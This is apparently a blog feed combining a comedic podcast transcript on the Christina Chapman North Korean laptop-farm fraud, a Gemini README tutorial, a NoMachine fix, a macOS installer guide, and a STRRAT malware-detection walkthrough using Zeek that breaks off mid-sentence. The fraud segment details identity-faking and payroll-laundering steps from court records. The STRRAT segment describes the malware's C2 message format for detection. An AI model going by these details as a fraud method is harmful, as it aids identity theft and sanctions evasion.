So the laptops are farmed. The identities are faked. Now comes everyone’s favorite part of the international crime ring. The money. The cold. Hard. Please don’t let the FBI find this cash.

00:12:39:30 – 00:12:49:22
Dr. Keith Jones
The paychecks. Over 17 million across the whole scheme were sent to bank accounts that Christina Chapman controlled.

00:12:49:27 – 00:12:59:03
Dr. Keith Jones
Basically, she became the unofficial CFO of North Korea. Except her accounting system was held together with duct tape, panic, and whatever app she happened to have open at the time.

00:12:59:08 – 00:13:11:55
Dr. Keith Jones
So you may ask yourself, what was her personal cut for all of this? About $176,000. That’s it.

00:13:12:00 – 00:13:24:56
Dr. Keith Jones
She took out three federal felonies, risked being the star of an FBI training slideshow, and jeopardized the rest of her life for a cut so small it would barely cover the cost of her criminal defense.

00:13:25:01 – 00:13:38:34
Dr. Keith Jones
We know some of this because the court documents show that between April and July of 2022, the US company made six direct deposits totaling over $27,000 for just one fake worker right into her account.

00:13:38:39 – 00:13:46:48
Dr. Keith Jones
That’s not a red flag. That’s a red billboard flashing “investigate me” to every federal agent within 200 miles.

00:13:46:53 – 00:14:02:17
Dr. Keith Jones
But it wasn’t always that easy. Here she is at the bank, trying to deposit a physical check and texting her coconspirator in full meltdown mode. She’s holding a check for Jerry P, but the account belongs to someone else entirely.

00:14:02:22 – 00:14:37:51
Dr. Keith Jones
And she messages. Are you there? I’m at the bank now with your check. Is the account in your name? I need to know. And the Coconspirator tells her the account actually belongs to an Anastasia. Not Jerry P. So picture this. She’s standing in front of a bank teller, palms sweaty, texting a North Korean agent like she’s asking her boyfriend: What kind of chips he wants from Walmart? This is the least discreet bank fraud attempt in U.S. history. Honestly, she could have worn a t shirt that says, ask me about my felonies, and it would have drawn less attention at this point.

00:14:37:56 – 00:14:54:32
Dr. Keith Jones
And the best part? She knew she was doing something monumentally stupid. A coconspirator admits a check is for a fake person, Irving B, and she replies, that’s probably why it didn’t go through my bank, as the name is fake.

00:14:54:37 – 00:15:06:35
Dr. Keith Jones
I could go to prison for fraud for that. And then, because we are apparently living in a sitcom, she immediately agrees to try depositing that check again.

00:15:06:40 – 00:15:10:23
Dr. Keith Jones
The dedication to poor decision making is almost admirable.

00:15:10:28 – 00:15:39:39
Dr. Keith Jones
And now the piece de resistance of her banking disasters. A bank got suspicious when another deposit for Andy P her coconspirator Tommy, a name that does not scream elite cyber operative from North Korea suggests: then we can prepare one of my U.S. friend. He has real U.S. number. And he can pretend to be Andy. And then she.

00:15:39:41 – 00:15:55:39
Dr. Keith Jones
Christina runs with it. She tells him, your friend here needs to go get a SIM card, saying he’s buying it for his friend Andy P so it gets put in his name. You guys obviously have a Social Security number for him, and she literally giving him tutorials on how to build a fake person.

00:15:55:44 – 00:16:00:46
Dr. Keith Jones
She’s not a coconspirator. She’s a customer success manager for a financial crime.

00:16:00:51 – 00:16:23:34
Dr. Keith Jones
And when the bank still won’t budge and insisted that Andy has to show up in person, what was her master plan? Tommy says he’ll prep a friend with Andy’s ID, and she replies, we need somebody who’s going to look like Andy. Ma’am, you’re suggesting that they cast a stunt double to commit bank fraud? What is this? Ocean’s 14?

00:16:23:39 – 00:16:52:13
Dr. Keith Jones
So the money is in. And now she has to get it out. And yes, this is absolutely how the feds close the case on her. The documents describe how she took that direct deposit money and personally transferred it overseas. This wasn’t money laundering. This was money rinsing. No layers, no shell companies, no crypto. Just a direct line from this payroll account to suspicious country.

00:16:52:13 – 00:16:59:19
Dr. Keith Jones
And it’s the smoking gun equivalent of hanging the FBI’s USB drive labeled top secret crime stuff.

00:16:59:24 – 00:17:29:00
Dr. Keith Jones
And where was all this being shipped? Right. Her shipping logs show that between 2022 and 2023, she sent at least 49 devices overseas. The top destination Dandong, China, a city sitting directly on the border with North Korea. Because nothing says totally innocent package like sending laptops to the exact border crossing used for half of North Korea’s illicit trade.

00:17:29:04 – 00:17:37:00
Dr. Keith Jones
She might as well have written. Hope this helps the regime. Hearts. Christina on the customs form.

00:17:37:05 – 00:18:08:46
Dr. Keith Jones
By this point, they’re not just trying to get jobs. They’re getting greedy. And this is where they overreach. They aim for U.S. government. A fake worker got a remote contractor position with.,get this, DHS and Immigration and Customs Enforcement, or ICE. They used her address in the scheme. It hit a wall because DHS or ICE requires physical fingerprints.

00:18:08:51 – 00:18:14:01
Dr. Keith Jones
The worker well, did not submit them. And so the worker was not hired.

00:18:14:06 – 00:18:23:10
Dr. Keith Jones
So your multimillion dollar international fraud ring was stopped by the same technology that unlocks an iPhone. That’s pretty brilliant.

00:18:23:15 – 00:18:30:00
Dr. Keith Jones
And my other favorite government attempt. They try to infiltrate the U.S. General Services Administration or the GSA.

00:18:30:05 – 00:18:35:10
Dr. Keith Jones
And when the worker using the stolen identity. Donald C.

00:18:35:15 – 00:18:49:39
Dr. Keith Jones
Yes, I had to look twice. Dong C spelled dong. And the last initial is C. When Dong applied, he provided Chapman’s address as his home and listed Christina as his spouse.

00:18:49:44 – 00:19:02:40
Dr. Keith Jones
So Christina is married to Dong, his spouse. And the name? I mean, come on, you can’t write this stuff, right? I mean, it sounds like a bad dick joke, but it was really in the court documentation.

00:19:02:45 – 00:19:19:24
Dr. Keith Jones
So unsurprisingly, this whole scheme did not work. The fake Dong C attended one meeting, couldn’t speak, and was terminated right after. Shocking. This is probably because his spouse, Christina, was busy mailing out laptops to China for other fake employees.

00:19:19:29 – 00:19:44:28
Dr. Keith Jones
So Christina’s clients weren’t just working. They were also stealing. Tthe court file details that one worker she helped named Marcus M was caught causing 15 separate unauthorized data transfers from a U.S. company to overseas. And this is 15 times. Another worker stole a large amount of data from a restaurant chain.

00:19:44:33 – 00:19:52:42
Dr. Keith Jones
And she got sloppy. After the data thief Darius W took a fake leave of absence, he asked her to ship him his laptop.

00:19:52:47 – 00:19:53:41
Dr. Keith Jones
And what did she do?

00:19:53:45 – 00:20:08:25
Dr. Keith Jones
She didn’t hide the evidence, she says. Or the court document says that on October 25th, 2023, Chatman sent Darius a photograph of the receipt confirming that the laptop was shipped to Pakistan.

00:20:08:30 – 00:20:14:15
Dr. Keith Jones
She sent him a receipt, which is basically the criminal equivalent of leaving a Yelp review for your own felony.

00:20:14:20 – 00:20:17:40
Dr. Keith Jones
Unbelievable. Next time, just put the receipt in the shredder.

00:20:17:40 – 00:20:19:39
Dr. Keith Jones
Christina, it’s not that hard.

00:20:19:44 – 00:20:39:41
Dr. Keith Jones
So she treated this whole thing like a chaotic, dysfunctional business and even invoiced for all of it. The court doc says that on a monthly basis, she charged for, quote unquote, rent and other fees, logging into laptops, tech support, shipping, all itemized on an invoice each month.

00:20:39:45 – 00:20:42:35
Dr. Keith Jones
And she even helped these North Korean workers

00:20:42:39 – 00:20:52:32
Dr. Keith Jones
get away with tax fraud because a coconspirator requested her assistance in obtaining a IRS form W-2 for one of the fake workers.

00:20:52:37 – 00:21:03:00
Dr. Keith Jones
Calling it really important for our work. And of course it was. You got to pay your taxes on your international espionage earnings, right? That’s how you stay legit.

00:21:03:05 – 00:21:06:21
Dr. Keith Jones
She even complained about her clients in a message, writing

00:21:06:26 – 00:21:17:36
Dr. Keith Jones
to one of her clients about some other client. She said. I’ll tell the other people who start tomorrow morning that Yuri says he’s more important because I don’t know who is on who’s team.

00:21:17:41 – 00:21:28:41
Dr. Keith Jones
I can’t reveal other names. I got some people in trouble for that before, she said. I got some people in trouble for that before. I really wish I knew more about that little scenario.

00:21:28:46 – 00:22:02:49
Dr. Keith Jones
But this one, this is my absolute favorite. One of her North Korean buddies says, hey, we need to switch payment from these other two services that we’ve been using to this third service. And she says back to their as a criminal mastermind, she says, back to the North Korean… That sounds good. The feds here now are tracking my every penny on service one and service two. They aren’t doing that on my service three yet. So there you go. She’s writing exactly what she’s doing in her messages that can be used against her later.

00:22:02:54 – 00:22:10:22
Dr. Keith Jones
Hahaha. She wrote that she messaged the feds are on us, so let’s use this other platform that they haven’t found yet.

00:22:10:27 – 00:22:15:21
Dr. Keith Jones
You realize you just created exhibit A for the conspiracy part of your charge, right?

00:22:15:25 – 00:22:20:31
Dr. Keith Jones
Holy hell. This chat is the criminal equivalent of sending a selfie from a getaway car.

00:22:20:36 – 00:22:37:22
Dr. Keith Jones
Which brings us to the grand finale. She repeatedly messaged her own fears. She told her coconspirator: What happens when my bank account gets flagged by the federal government? I get in trouble and I go to prison in another group chat. She tries to set boundaries but just ended up confessing again.

00:22:37:23 – 00:22:43:05
Dr. Keith Jones
She wrote in the future, I hope you guys can find other people to do your physical I-9.

00:22:43:10 – 00:22:55:55
Dr. Keith Jones
These are federal documents. I will send them for you, but have someone else do the paperwork. I can go to in all caps federal prison for falsifying federal documents.

00:22:56:00 – 00:23:01:46
Dr. Keith Jones
She literally drew the line at filling out the form, but not mailing the fraud.

00:23:01:51 – 00:23:06:17
Dr. Keith Jones
Totally fine. I guess everybody has her own comfort level with felony charges,

00:23:06:22 – 00:23:35:26
Dr. Keith Jones
But she wasn’t quite done bumbling yet. When the FBI finally came knocking at her door and October of 2023, she was actually on a flight home. And when she found out remotely, what did she do? She jumped back into the group chat with the North Koreans and she wrote: Shut the fuck up, the FBI is at my house. And the best part? They didn’t believe her. They thought she was joking. So she ended up also deleting a bunch of Skype

00:23:35:30 – 00:23:39:39
Dr. Keith Jones
messages to try to cover her tracks, which, spoiler alert, didn’t work.

00:23:39:44 – 00:23:50:30
Dr. Keith Jones
So with a chat history like that, what’s a defense attorney to do? It can’t do anything, unsurprisingly. On February 4th, 2025, Christina Chapman pled guilty.

00:23:50:35 – 00:24:05:37
Dr. Keith Jones
The evidence, in her words, was overwhelming. She pled guilty to three major counts. The first was conspiracy to commit wire fraud. The second was aggravated identity theft. And third was conspiracy to launder monetary instruments.

00:24:05:41 – 00:24:14:58
Dr. Keith Jones
On July 24th, 2025, the judge handed down the sentence and Chapman got 102 months in federal prison, which I can’t do the math. I had to grab my calculator.

00:24:14:58 – 00:24:41:58
Dr. Keith Jones
That’s eight and a half years. She also has three years of supervised release after she gets out, and that 1% cut that she made. Did she use it to pay her criminal defense lawyer? Nope. The court ordered her to forfeit that whole monetary amount for exactly $176,000, and she has to pay back every dime she made with that.

00:24:42:03 – 00:24:56:43
Dr. Keith Jones
But she has $20,000 on top of that, which was restitution to the victims for paying for, responses and all that kind of stuff. And, you know, paying money that they didn’t really get services for, I don’t think.

00:24:56:48 – 00:25:04:57
Dr. Keith Jones
So. She had to pay back her winnings, and she had to pay $20,000 on top of that and go to prison for eight and a half years, which is quite a long time.

00:25:05:01 – 00:25:31:51
Dr. Keith Jones
But don’t worry about Christina, okay? She has plans for her future because nothing fuels entrepreneurial spirit. Like eight and a half years of federally mandated reflection in prison. In her letter to the judge asking for leniency, she outlined her post-prison career goals. She wrote, I would like to continue to pursue the books that I have been working on writing and starting my own underwear company.

00:25:31:56 – 00:25:56:05
Dr. Keith Jones
You cannot make this stuff up. From international North Korean fraud ring to underwear mogul. That’s quite a career pivot. So sharp it should come with the neck brace. I’m just glad she’s aiming high. Federal prison is the perfect focus group for a new line of durable undergarments. If your product can survive the laundry rotation at FCI Phoenix, it can survive anything.

00:25:56:10 – 00:26:18:29
Dr. Keith Jones
Well, listeners, the case of Christina Chapman is a wild one. It’s a national security story about sanctions busting. It’s a cybercrime story about the vulnerabilities of a work from home world. And it’s a masterclass in what happens when someone with zero operational security tries to run a multinational fraud ring using the same laptop they check Facebook on.

00:26:18:34 – 00:26:25:48
Dr. Keith Jones
But most of all, it’s a very human story about a series of bafflingly poor decisions.

00:26:25:53 – 00:26:40:15
Dr. Keith Jones
It proves that in a digital age, the smoking gun isn’t a gun at all. Sometimes it’s just hitting send and a message that says, I can go to federal prison for this, which she did multiple times.

00:26:40:20 – 00:26:53:34
Dr. Keith Jones
What a case. This thing had everything. Identity theft, money laundering, technical incompetence, government infiltration. Attempts that failed harder than a crypto bro portfolio.

00:26:53:39 – 00:27:12:28
Dr. Keith Jones
A level of denial that should be studied by psychologists. And a finale straight out of dark comedy written by someone who’s been awake for about 72 hours. All right, you crazy bastards. Thanks for tuning in. I hope to see you on our next episode, which will be another crazy case just like this. Thanks. Bye.

The post Inside the North Korean Laptop Farm: How Christina Chapman Defrauded 300+ U.S. Companies from Arizona first appeared on DrKeithJones.com.

https://github.com/keithjjones/zeek-amadey-detector

So instead of fixing my own mess, I made Gemini do it.

In this video:

• How to upload your Zeek package into Gemini
• The prompt I use
• How Canvas mode helps write a good README
• How to refine tone (dark humor encouraged)
• And how to NOT lose your mind exporting Markdown

If your docs look like ancient hieroglyphics carved during a power outage, this one’s for you.

Transcript:

00:00:00:17 – 00:00:29:28
Dr. Keith Jones
Hey everyone, it’s Keith. And today I’m here to admit publicly on the record that I write Zeek packages and still refuse to document them like anything resembling a fully functional human adult. My documentation style is basically “I’ll remember what this does later”. And spoiler, I never do. So today I’m going to show you how to use Google Gemini to produce a readme that doesn’t look like a digital ransom note.

00:00:29:28 – 00:00:53:16
Dr. Keith Jones
I wrote a Zeek package. It’s the Zeek Amadey malware detector. Built it myself because apparently I enjoy hunting malware more than I do documenting my own code. I’m about to throw the repo up on the screen so you can witness this creature in its natural habitat. And the readme that I originally wrote was so bad, it should have been quarantined.

00:00:53:18 – 00:01:14:27
Dr. Keith Jones
If the cyber police knocked on my door and charged me with documentation negligence, I would be guilty. So instead of fixing my own disaster, I yeeted this into Gemini like a cursed artifact and said, good luck, Gemini. But it worked disturbingly well. Let me show you how you can outsource your shame the exact same way I did.

00:01:14:27 – 00:01:42:08
Dr. Keith Jones
So here’s where the fun begins. You think you’re going to upload your nice, tidy little Zeek project into Gemini and haha, no. Gemini only allows ten files at a time per prompt, which is adorable considering most packages are more than ten files. There are usually more of them, more files than you want to upload one by one. So let me show you an automated trick that I use to get around this.

00:01:42:10 – 00:02:04:18
Dr. Keith Jones
As you can clearly see, my project has a generous file count. So what are we going to do? We bend the rules like morally flexible adults. Gemini will let you upload a zip as long as that zip file has ten or less files in it. So you see where I’m going with this? I’m going to upload multiple zips with multiple files in them.

00:02:04:18 – 00:02:25:26
Dr. Keith Jones
As long as the zip file has ten or less files. Gemini will be happy with us. So in my case, I’m going to zip up three things. I’m going to zip up the script files, which is the meat of the logic that I wrote, the testing baseline output, which is logs and things like that. And then the test cases itself.

00:02:25:28 – 00:02:43:23
Dr. Keith Jones
And then I’m going to upload the readme the, the bad one that I wrote initially. And I’m going to upload that uncompressed. So Gemini can basically just start reading it and working on it. But before I do any of that I have to actually make these zip files because Gemini won’t take these files just by dragging and dropping.

00:02:43:25 – 00:02:56:11
Dr. Keith Jones
So I create multiple zips and I named them things like, you know, scripts.zip, tests.zip, the baselines.zip. Group them however it makes sense for your project. I just picked this for my project.

00:02:56:11 – 00:03:13:17
Dr. Keith Jones
Then you simply upload these zip files like you’re smuggling contraband across the AI border. Gemini doesn’t check IDs. It just nods. Let’s them in. Boom. More than ten files uploaded. Problem solved, loophole exploited, and researcher satisfied.

00:03:13:18 – 00:03:51:01
Dr. Keith Jones
Okay, before we move on, here’s an important step. Once your files and zips are uploaded, turn on canvas mode inside Google Gemini. What this does is it lets you collaborate with the AI in real time. You can make edits on the fly and shape your whole readme file as it develops. It’s like having an AI editor who doesn’t sigh loudly every time you miss a comma too. Canvas mode gives you space to tweak phrasing, punch up jokes, fix hallucinations, and generally clean up whatever gremlins Gemini sneaks into the first draft.

00:03:51:03 – 00:03:55:14
Dr. Keith Jones
We’ll use it to refine the readme into something you can actually publish without feeling shame.

00:03:55:16 – 00:04:22:13
Dr. Keith Jones
Once all the zip files are uploaded, this is the exact prompt I use. And look. This was my first attempt at making a prompt specifically for documentation, so don’t treat it like some sacred text. Use it as a starting point. Add to it, tweak it, and mutate it into something more useful for your package. Think of it as a template, not a commandment carved into stone by a caffeinated cybersecurity monkey.

00:04:22:13 – 00:04:23:27
Dr. Keith Jones
And I’m going to read the prompt for you.

00:04:23:27 – 00:04:43:02
Dr. Keith Jones
It says, I am the author of this Zeek package and my readme file could be much better. That’s true. Make a readme file with the following items. What this package detects. How this package detects it. The benefits of running this package. How to install this package. Example output from this package.

00:04:43:05 – 00:04:57:17
Dr. Keith Jones
What to do if this package identifies a detection on your network? And do not put emojis in the readme. And when displaying Zeek logs, use the full tab separated value format instead of the JSON format.

00:04:57:17 – 00:05:06:02
Dr. Keith Jones
yes, I did have to tell it to not use emojis because the last thing I need is a readme that looks like it was written by a bunch of middle schoolers.

00:05:06:04 – 00:05:09:17
Dr. Keith Jones
So now copy this prompt into Gemini and let it rip.

00:05:09:17 – 00:05:29:24
Dr. Keith Jones
So here is where Gemini really flexes. It takes your prompt, throws into whatever overclocked cosmic blender it uses to turn raw chaos into documentation, and spits out a readme that is annoyingly better than anything I would have produced on my best day with eight hours of sleep and double espresso.

00:05:29:27 – 00:05:41:13
Dr. Keith Jones
It’s like hiring someone to clean my house, only to discover they didn’t just tidy up. They alphabetized my condiments. They rewired my cable modem, and they found a remote that I lost in 2019.

00:05:41:15 – 00:05:51:12
Dr. Keith Jones
At some point, it stops being helpful and it starts feeling like a personal attack. So Gemini was able to produce clear and accurate detection explanations.

00:05:51:15 – 00:06:04:14
Dr. Keith Jones
Reasonably sane installation instructions. The example logs are TSV instead of JSON, just like I asked, and it has a tone that suggests that the author is well-rested, which is a lie.

00:06:04:14 – 00:06:15:19
Dr. Keith Jones
It even fabricates example Zeek logs so realistic that I had to triple check they weren’t actually from my network. At this point, I’m not sure if Gemini is helping me or quietly staging a coup.

00:06:15:22 – 00:06:49:01
Dr. Keith Jones
And before you paste this masterpiece that it produced in the GitHub, read over it. Make sure Gemini didn’t hallucinate anything hilariously wrong. Like claiming my Zeek package can detect ransomware via vibes, or that it logs data directly into Splunk without the usual 400 step configuration ritual that goes along with it. Once everything looks good, copy it into Readme.md and enjoy the dopamine rush of looking productive without actually doing the work.

00:06:49:04 – 00:07:10:00
Dr. Keith Jones
Now this step is optional. Okay, there’s a trick that I recommend to polish it once Gemini gives you this clean professional, readme. You can then ask it to rewrite the whole thing in whatever tone you want. So if you have a certain tone when you write articles, you can give it example output and say write it in my tone.

00:07:10:03 – 00:07:31:28
Dr. Keith Jones
So for instance, I could go back to Gemini and say Gemini, rewrite this using sarcasm and dark humor. And that’s when your natural tone is, say, a blend of exhausted researcher and stand up comedian. We don’t put this in our original prompt because we want on our first pass just to get the facts out, and we want it clean and accurate.

00:07:32:00 – 00:07:37:16
Dr. Keith Jones
But after that, then you can layer in whatever personal flavor you want to make the content fun.

00:07:37:16 – 00:07:48:17
Dr. Keith Jones
Think of it like cooking. The first version is the recipe. The second version is the version where you say to hell with the measurements and start tossing in spices until it tastes like your personality.

00:07:48:17 – 00:07:52:21
Dr. Keith Jones
Okay, the last step here is actually the hardest step, in my opinion, of everything.

00:07:52:21 – 00:08:14:22
Dr. Keith Jones
When we are done, we want to take this data that we produce with Gemini and copy it into our README.md. So what we do is we need to copy it in markdown format. And if you use just the copy command on this canvas, you’re not going to get markdown. It’s actually a quite involved little process to get the markdown out.

00:08:14:22 – 00:08:20:13
Dr. Keith Jones
So prepare yourself emotionally, because exporting a canvas to markdown is a journey.

00:08:20:13 – 00:08:36:12
Dr. Keith Jones
First thing you’re going to do is you’re going to export this canvas to a Google Doc. Yes, a Google Doc. We’re already off to a weird start. You’re going to open this Google Doc and you’re going to copy everything you know, ctrl-a to select everything,

00:08:36:12 – 00:08:40:16
Dr. Keith Jones
and you’re going to go to the edit button and say copy as Markdown.

00:08:40:19 – 00:08:45:07
Dr. Keith Jones
That’s what’s going to get you your special markdown format that you’re going to put back into your readme.

00:08:45:07 – 00:08:52:00
Dr. Keith Jones
And now you’re going to take this and you’re going to paste it back into your readme.md file, and you’re going to see the markdown as intended.

00:08:52:02 – 00:09:03:25
Dr. Keith Jones
Now once you are done, you have this stupid Google document just sitting around on your drive that you probably don’t need anymore because you only needed the markdown formatted version of your content.

00:09:03:27 – 00:09:27:20
Dr. Keith Jones
So you can actually go up to file and click and say, move this to the trash can so I don’t have to deal with it anymore. So it’s a painful process, needlessly painful, especially when you compare it to the other chats like ChatGPT, where markdown is literally built in and it’s just a button, just a copy button, and you don’t have to worry about making the document and copying it out fancy or anything like that.

00:09:27:23 – 00:09:33:16
Dr. Keith Jones
But here you have to perform a multi-step purification ceremony. But hey, it’s worth it right?

00:09:33:16 – 00:09:52:05
Dr. Keith Jones
And that’s it. That’s how I use Gemini as my unpaid intern, documentation assistant, and emotional support AI. If this helped you produce a readme that doesn’t look like it was typed with someone wearing oven mitts, please feel free to like and subscribe… or don’t. I’m not your boss.

The post How I Used Gemini To Fix My Terrible Zeek Documentation first appeared on DrKeithJones.com.

The easiest way I found to solve this problem is to restart the NoMachine server. Fortunately, this can be done remotely. Ensure the sense of caps is off on the remote computer by typing a few test characters, then restart NoMachine. Once restarted, ensure your local sense of caps is off and connect to the remote machine. At this point, your caps lock should be in sync between your local and remote computers.

The post Fix NoMachine’s CAPS LOCK Reversal Bug first appeared on DrKeithJones.com.

https://securityunfiltered.com/episode/keith-jones-journey-as-expert-digital-forensics-expert-to-ai-malware-researcher

The post Keith Jones’ Journey As Expert Digital Forensics Expert To AI Malware Researcher first appeared on DrKeithJones.com.

After some research, I found a workaround: manually downloading the installer and writing it to a USB stick. If you’ve ever been stuck in a similar situation, here’s how you can do it, too.

The Problem: App Store Download Issues

Updating macOS through the App Store should be straightforward—find the update, click download, and let the system handle the rest. However, some users (myself included) have encountered a strange issue where the macOS Sequoia installer refuses to download correctly.

Usually, when the App Store fails, you can use a bootable USB installer to upgrade your system. But what do you do if you can’t get the installer from the App Store in the first place?

The Solution: Manually Downloading macOS Sequoia

While looking for a solution, I came across this article by Wolf Paulus. It provided the key information I needed: using a script called gibMacOS to fetch the macOS installer manually.

gibMacOS is an open-source tool that allows you to download macOS installers directly from Apple’s servers. The best part? It can build a bootable USB installer for you.

Step-by-Step Guide to Manually Download macOS Sequoia

If you’re experiencing the same issue I did, follow these steps to download and install macOS Sequoia manually:

1. Download gibMacOS

First, you’ll need to grab the gibMacOS script from its GitHub repository:

gibMacOS on GitHub

To download it, open a terminal and run:

git clone https://github.com/corpnewt/gibMacOS.git
cd gibMacOS

If you don’t have git installed, you can manually download the ZIP file from GitHub and extract it.

2. Run gibMacOS

On macOS, run:

./gibMacOS.command

This will open a menu where you can choose the version of macOS you want to download. Look for macOS Sequoia and select it.

3. Install The Instaler

Double-click the downloaded installer to create the MacOS installer in the /Applications directory.

4. Create a Bootable USB Drive

Now that you have the full installer, you must create a bootable USB drive. Insert a USB stick with at least 16GB of space and format it as Mac OS Extended (Journaled) using Disk Utility.

Then, run the following command (replace MyUSB with the actual name of your USB drive):

sudo /Applications/Install\ macOS\ Sequoia.app/Contents/Resources/createinstallmedia --volume /Volumes/MyUSB

This will write the installer to the USB drive.

5. Install macOS Sequoia

Once the USB installer is ready:

1. Restart your Mac and hold Option (⌥) while booting.
2. Select the macOS Sequoia Installer from the boot menu.
3. Follow the on-screen instructions to install or upgrade macOS.

Final Thoughts

Dealing with unexpected issues updating macOS can be frustrating, especially when the App Store refuses to cooperate. However, as this experience showed me, there’s always a workaround. gibMacOS is a powerful tool that helps you manually download macOS installers and gives you complete control over the upgrade process.

Whether you’re troubleshooting a buggy system, creating a bootable installer for multiple Macs, or simply preferring to have a local copy of macOS on hand, this method ensures you’re never stuck waiting on the App Store. While it requires a few extra steps, the ability to bypass download issues, build a bootable USB, and install macOS on your terms makes it well worth the effort.

PS – I found a second script, but I haven’t tried it yet: https://github.com/munki/macadmin-scripts/blob/main/installinstallmacos.py

The post Manually Download MacOS Sequoia first appeared on DrKeithJones.com.

The post Drone Flight @ BWI Airport Sept 8, 2024 first appeared on DrKeithJones.com.

Corelight Blog: https://corelight.com/blog/newsroom/news/strrat-malware

Source Code: https://github.com/corelight/zeek-strrat-detector

00:00:10:18 – 00:00:37:17
Dr. Keith Jones
Hey, welcome. We’re going to talk about how to detect STRRAT, which is a malware family. This this malware is written in Java, and this malware family is remote access Trojan, you know, provides access to a victim computer once it’s executed on it. But it also steals information and it sends this information using a C2 protocol between the victim computer and this malware infrastructure.

00:00:37:20 – 00:01:01:25
Dr. Keith Jones
And we’re going to figure out a way to detect the STRRAT malware by looking at that connection. Okay. So you probably wonder, you see why STRRAT? Why didn’t you pick something else? Well, STRRAT bubbled up to the top on this chart of one of my favorite malware sandbox providers Any dot run, they have this handy chart.

00:01:01:28 – 00:01:25:02
Dr. Keith Jones
The malware trends chart, and when you go in there, they will aggregate the information that’s been submitted to their sandbox over time. And the most prevalent families will bubble up to the top. So what I do is I usually start at the top of that chart and start looking at the most prolific malware, and I start looking at the network traffic that they send

00:01:25:26 – 00:01:45:20
Dr. Keith Jones
when that any dot run captures, when they execute the malware. Now if so, what I did is on that malware trends I noticed that STRRAT was at the top. And then I started looking at submissions and I found this submission here that when you click in there, there’s the network window pane at the bottom. And there’s a little spot down there.

00:01:45:20 – 00:01:54:11
Dr. Keith Jones
It says I think it says pcap. And when you click on that you can actually download the network traffic that occurred when this malware sample was executed.

00:01:54:11 – 00:02:08:12
Dr. Keith Jones
You can put that into another free tool called Wireshark. And it looks like this. And there’s this TCP port 8219. There’s this connection that happens in that, in that pcap that I’m showing you on your screen.

00:02:08:12 – 00:02:28:11
Dr. Keith Jones
You can see every different, all the different packets that go across the wire at that time. Now you can actually right click on any of those lines and say follow TCP stream. And it takes the data, all that ugly stuff that you see at the bottom, and it basically puts it together in one session for you. Like this.

00:02:28:13 – 00:02:48:20
Dr. Keith Jones
So once we look at this session, you can start to see some patterns. You see like a number. You see a blank line. You see this really long line. And then you see a number again blank line and then a really long line. And then it just keeps going over and over and over. So to a trained eye you look at this and you say oh well this looks like messages.

00:02:48:20 – 00:03:08:17
Dr. Keith Jones
It’s a series of messages that are sent across the network. And just eyeballing this, I mean, this is the ping command, which I just know because I studied it. It’s kind of like a check in command to STRRAT. So the victim computer every now and that’ll just check in with the malware infrastructure and say, hey, anything new?

00:03:08:17 – 00:03:29:16
Dr. Keith Jones
Should I be doing anything? And that’s the ping command that you see here. Now, just one of those messages. Like I said, it’s actually several lines here. We see, you know, the very first one I have, this number, this Ascii number, this isn’t actually a, it’s written in Ascii on the network. So it’s not the actual number on the network.

00:03:29:20 – 00:03:52:28
Dr. Keith Jones
And then it has a blank line, and then it has this big payload. And what we got to do is we got to take this number, which ends up being the length of this payload, in order to chop up this payload as well, you need that length in order to know when to stop chopping up that payload and when the next message starts.

00:03:53:01 – 00:04:14:25
Dr. Keith Jones
So now that we know that that’s the general format of these messages, we can write an analyzer in this language underneath Zeek called Spicy. Now Zeek will sit there and watch your network for different things that happen that you can, you know, you could say, hey, if the TCP connection is too big, alert me, or if I’m dropping packets, alert me, that type of thing.

00:04:14:27 – 00:04:35:05
Dr. Keith Jones
Well, what we’re going to do is we’re going to write a detector that looks for the STRRAT data that goes across the wire. But to do that, we got to write it in a lower level language underneath that Zeek called Spicy. That actually takes that low level data, chops it up into the fields. And that makes it available to Zeek.

00:04:35:07 – 00:04:59:07
Dr. Keith Jones
Sounds complicated I know. But it’s actually when I explain to you I hope it comes across that it’s not that complicated. So to get my point across, let’s talk about the Zeek, the Spicy analyzer itself. So here’s the Spicy code. And it’s only 11 lines. This is a really, really I don’t say trivial, but a very simple protocol that we’ll be chopping up.

00:04:59:10 – 00:05:29:14
Dr. Keith Jones
So the real meat of it happens between lines seven and 11. And this chops up one message and you can see I’m saying, Len, Len, that stands shorthand for length. And it’s saying you should be looking for data that is an Ascii number, which is exactly what we saw. And this is the cool part. I take that info and I plug it into or I use a function I call to int, and I turn the Ascii representation of a number into a real representation of the number in an integer.

00:05:29:14 – 00:05:46:15
Dr. Keith Jones
It’s awesome. So now this becomes an integer and I can do stuff with it. And then this field here, I don’t really care. I’m not going to save it I don’t care. So I don’t name it anything. But I do know that it’s the blank line. So I have this series of new lines and carriage returns that are expected from this malware.

00:05:46:17 – 00:06:05:21
Dr. Keith Jones
And then the last line here says, hey, your payload is going to be a size of length. That’s it. I mean, that’s that’s how simple it is. So this chops up one message. And then if we go up here, we see that one message gets turned into an array. And now we have a plural name of STRRAT messages.

00:06:05:23 – 00:06:25:19
Dr. Keith Jones
So now Spicy is going to look at a connection and pass an array of these messages. Now how do we do that in Zeek there’s this thing called a dynamic protocol detection signature that you can write. And this is what it looks like for this guy. It’s only you know actually two lines of stuff that you need to search.

00:06:25:19 – 00:06:47:25
Dr. Keith Jones
It’s lines two and three. So really what the signature says on line four is when you hit these things, enable this STRRAT analyzer that I just showed you earlier. Okay. So when these two things are are true turn on the STRRAT analyzer. And those two things are the protocol has to be TCP. So basically throw out everything else.

00:06:47:27 – 00:07:20:21
Dr. Keith Jones
And then this payload has to hit this regular expression. And it starts with an Ascii number. Has that new line. And then it’s got this command. And then you can see there’s the pipe symbol the STRRAT and the pipe symbol. And that it looks at it case Insensitively. Now when this hits it triggers this Spicy program to be running on that connection, which then starts chopping up data and sending it to Zeek so we can right now a Zeek program, which don’t get discouraged.

00:07:20:21 – 00:07:41:20
Dr. Keith Jones
The first half of this is boilerplate. So we don’t really start until line 11. So here in the Zeek code we’re saying a line 11 when there’s a separate message parsed and this event fires, we’re going to take the data that it parsed. You see here there’s the payload and all that stuff and the connection. We’re going to put that into a nice little message.

00:07:41:23 – 00:08:03:25
Dr. Keith Jones
And then we’re going to take the payload. And we’re going to put it in a sub field of the notice log. So if you run Zeek with this logic and the pcap that I talked to you about earlier, you’re going to get a notice log that will look like this, which really those two lines are the important ones. And you can see over here that it said hey I found STRRAT.

00:08:03:28 – 00:08:26:11
Dr. Keith Jones
It says it in the human readable version. And then there is the payload where it starts with ping and all that. Pretty cool So all that logic detected STRRAT on our network and then gave us the data so we could actually do something with it now. So some people, they don’t care what the payload is. To malware analysts,

00:08:26:11 – 00:08:44:23
Dr. Keith Jones
